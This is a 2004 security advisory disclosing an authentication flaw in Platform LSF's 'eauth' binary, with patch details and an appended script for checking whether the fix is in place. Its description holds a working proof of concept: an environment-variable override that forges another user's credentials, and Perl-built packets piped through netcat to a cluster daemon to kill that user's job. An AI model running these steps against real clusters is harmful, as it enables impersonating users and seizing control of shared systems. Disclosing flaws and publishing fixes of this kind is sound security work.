Lam3rZ Security Advisory #2/2004                                23 Feb 2004

Remote (within a cluster) root in LSF

Name:             Load Sharing Facility versions 4.x, 5.x, 6.x
Severity:         High
Vendor URL:       http://www.platform.com
Author:           Tomasz Grabowski (cadence@aci.com.pl)
Vendor notified:  29 Oct 2003
Vendor confirmed: 30 Oct 2003
Vendor advisory:  9 Feb 2004

Note:
-----
This vulnerability differs from the one described in Lam3rZ Security
Advisory #1/2004.

Impact:
-------
"eauth" is the component within LSF which controls authentication. It can
be exploited to send commands to LSF on behalf of a different user. In this
way a user could submit and control jobs on behalf of other users.

This security risk is contained to the "local cluster". This means that it
can be exploited remotely (from one host to another), but only between
hosts within the LSF cluster.

Description:
------------
"eauth" has a very dangerous undocumented feature. Namely, during its
execution it checks for the LSF_EAUTH_UID environment variable. If it
finds it, it uses that value instead of the real UID of the user who
invoked the "eauth" binary. This way an attacker is able to generate the
authentication string of any user in the system. It can be used to control
processes on behalf of other users in the cluster. Moreover, as such an
authentication string is used for some administrative commands, the
attacker is able to control the cluster itself.

In order to steal another user's process the attacker needs to know the
authentication data for that user. In most cases she will need just the
"lsfadmin" authentication data, because this user can control other users'
processes, but let's say she wants to steal a process from user "cadence".

$ cat /etc/passwd | grep cadence
cadence:x:500:500:Tomasz Grabowski:/home/cadence:/bin/bash
$ export LSF_EAUTH_UID=500
$ eauth -c hostname
,',0/%+-$%$&&,/)

Now, she needs to send packets. She can do it, for the sake of simplicity,
using Perl and NetCat software:

(
# first packet
perl -e '
print "\x04\x00\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x00";
print "\x00\x00\x00\x00";
'
sleep 1;
# let's call it a header, packet length
perl -e '
print "\x00\x04\x00\x00\x0d\x00\x00\x00\x00\x00\x00\x40";
# below we provide UID, GID and length of user name
print "\x00\x00\x00\x00\x00\x00\x03\xee\x00\x00\x03\xee\x00\x00\x00\x07";
# below is the user name, end indicator, and probably auth data field length
print "\x63\x61\x64\x65\x6e\x63\x65\x00\x00\x00\x00\x03\x00\x00\x00\x10";
# again authentication length and auth data itself
print "\x00\x00\x00\x10\x2a\x30\x26\x24\x21\x25\x2e\x23\x2c\x23\x27\x2d";
# rest of auth data, end indicator, question code (x09 - bkill) and process number
print "\x2f\x28\x2b\x25\x00\x00\x00\x02\x00\x00\x00\x09\x00\x00\x00\x77";
print "\x00\x00\x00\x00";
'
# send it to the target daemon
) | nc 192.168.10.106 6881

After sending these two packets, she will kill process number 119
belonging to user "cadence".

How to patch:
-------------
This problem has been directly addressed in a security patch released for
LSF. The fix is contained to the "eauth" binary, which will need to be
replaced for each platform used in the cluster.

The patch can be downloaded from the Platform FTP site.

FTP:     ftp.platform.com
Path:    patches//os//eauth*
Example: patches/5.1/os/sparc-sol7-64/eauth5.1_sparc-sol7-64.Z

If the OS or version is not currently available, it can be built on demand.
Please contact Platform Technical Support if you have any questions or
concerns.

Phone: 1-877-444-4573
Email: support@platform.com

References:
-----------
This bug was confirmed in Platform's official security advisory dated
9 Feb 2004. It is accessible directly from Platform as Knowledge Base
Article KB1-5T4XV.

--
Tomasz Grabowski
Technical University of Szczecin, +48 (91)4494234
Academic Centre of Computer Science
www.man.szczecin.pl
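The following script is an added example, not part of the advisory or of Platform's patch: it lets an administrator confirm, on each host, that the replaced "eauth" binary no longer honours LSF_EAUTH_UID (the check described under "How to patch" is only a file swap, so a per-host verification is worth having). It assumes that eauth prints a deterministic string for a given host when called as "eauth -c host", as in the session above; if two identical calls disagree, it reports INCONCLUSIVE instead of guessing.

```shell
#!/bin/sh
# Added example (not from the advisory or Platform): does this eauth still
# honour LSF_EAUTH_UID?  Usage: eauth_env_uid_check /path/to/eauth [host]
# Prints VULNERABLE (exit 1), PATCHED (exit 0) or INCONCLUSIVE (exit 2).
eauth_env_uid_check() {
    eauth_bin="$1"
    host="${2:-$(uname -n)}"
    real_uid="$(id -u)"
    # Probe with a uid that is certainly not our own; no account needs to exist.
    if [ "$real_uid" = "0" ]; then other_uid=1; else other_uid=0; fi

    # Baseline: the string eauth emits for the calling user, override unset.
    base="$( (unset LSF_EAUTH_UID; "$eauth_bin" -c "$host") )" || return 2
    # Control: overriding with our own uid must give the same string if the
    # output is deterministic; otherwise a comparison proves nothing.
    same="$(LSF_EAUTH_UID="$real_uid" "$eauth_bin" -c "$host")" || return 2
    # Probe: overriding with another uid must NOT change the string on a
    # patched binary, because only the real uid should be used.
    other="$(LSF_EAUTH_UID="$other_uid" "$eauth_bin" -c "$host")" || return 2

    if [ "$base" != "$same" ]; then
        echo INCONCLUSIVE   # e.g. a timestamp in the token; inspect manually
        return 2
    elif [ "$base" != "$other" ]; then
        echo VULNERABLE     # the environment variable changed the auth string
        return 1
    fi
    echo PATCHED
    return 0
}

# Stand-alone use: pass the path of the cluster's eauth binary.
if [ "$#" -gt 0 ]; then
    eauth_env_uid_check "$@"
    exit $?
fi
```

Run it as the ordinary user whose UID the auth string is supposed to reflect, not as root, so that the probe uid 0 is a genuinely different identity.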